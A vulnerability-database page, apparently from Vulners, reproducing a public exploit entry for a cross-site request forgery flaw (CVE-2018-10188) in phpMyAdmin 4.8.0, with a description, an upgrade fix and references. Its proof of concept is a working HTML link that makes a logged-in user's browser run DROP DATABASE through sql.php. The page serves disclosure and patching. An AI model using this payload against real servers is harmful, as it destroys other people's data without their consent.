Lucene search
K

phpMyAdmin 4.8.0 / 4.8.0-1 - Cross-Site Request Forgery Vulnerability

🗓️ 23 Apr 2018 00:00:00Reported by revengshType 
zdt
 zdt
🔗 0day.today👁 62 Views

phpMyAdmin 4.8.0-1 Cross-Site Request Forgery Vulnerability #1. SQL.php script verification failure #2. Attacker executes arbitrary SQL #3. Crafted request drops database #4. Upgrade to phpMyAdmin 4.8.0-1 #5. CVE-2018-10188 referenc

Related
Code
ReporterTitlePublishedViews
Family
AlpineLinux
CVE-2018-10188
19 Apr 201814:00
alpinelinux
Circl
CVE-2018-10188
25 Apr 202421:25
circl
CNVD
phpMyAdmin Cross-Site Request Forgery Vulnerability (CNVD-2018-09386)
11 May 201800:00
cnvd
CVE
CVE-2018-10188
19 Apr 201814:00
cve
Cvelist
CVE-2018-10188
19 Apr 201814:00
cvelist
Debian CVE
CVE-2018-10188
19 Apr 201814:00
debiancve
Exploit DB
phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
23 Apr 201800:00
exploitdb
EUVD
EUVD-2022-5295
3 Oct 202520:07
euvd
exploitpack
phpMyAdmin 4.8.0 4.8.0-1 - Cross-Site Request Forgery
23 Apr 201800:00
exploitpack
Github Security Blog
phpMyAdmin CSRF vulnerability allowing arbitrary SQL execution
14 May 202203:22
github
Rows per page
# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
# Software Link: https://www.phpmyadmin.net/
# Author: @revengsh & @0x00FI
# CVE: CVE-2018-10188
# Category: Webapps
 
 
#1. Description
#The vulnerability exists due to failure in the "/sql.php" script to properly verify the source of HTTP request.
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.
#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database.
 
 
<html>
  <body>
    <a href="http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]">
      Drop database
    </a>
  </body>
</html>
 
#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.
#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188

#  0day.today [2018-04-23]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Apr 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.0065
62